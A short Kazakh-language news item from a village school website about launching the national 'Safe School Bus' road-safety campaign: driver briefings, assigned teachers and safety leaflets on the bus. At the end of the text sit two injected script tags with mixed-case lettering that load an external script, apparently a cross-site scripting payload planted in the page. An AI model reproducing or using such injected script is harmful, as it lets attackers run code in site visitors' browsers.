11.10.2023 ж «Қауіпсіз мектеп автобусы үшін» ұранымен «Еленовка ауылының жалпы білім беретін мектебі» КММ-де «Қауіпсіз мектеп автобусы» республикалық акциясы басталды. Республикалық акция балаларға, ата-аналарға және қоғамға жол қауіпсіздігі және балаларды тасымалдау ережелері туралы ескертуге айналуы тиіс. «Еленовка ауылының жалпы білім беретін мектебі» КММ-де балаларды тасымалдау қауіпсіздігін арттыру мақсатында профилактикалық іс-шаралар жүргізіліп, оның аясында мектеп автобусының жүргізушісіне жол қауіпсіздігін қамтамасыз ету және жол қозғалысы ережелерін бұзуға жол бермеу; мектеп директорының бұйрығымен балаларды тасымалдауға жауапты мұғалімдер тағайындалды, мектеп автобусының салонында «Оқушылардың мектеп автобусындағы өзін-өзі ұстау ережелері», «Жаяу жүргіншілер жолында қауіпсіз жүріс-тұрыс ережелері» тақырыптық жадынамалар орналастырылды. ; мектеп автобусындағы жолаушылармен брифинг өткізілді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Просмотров: 521
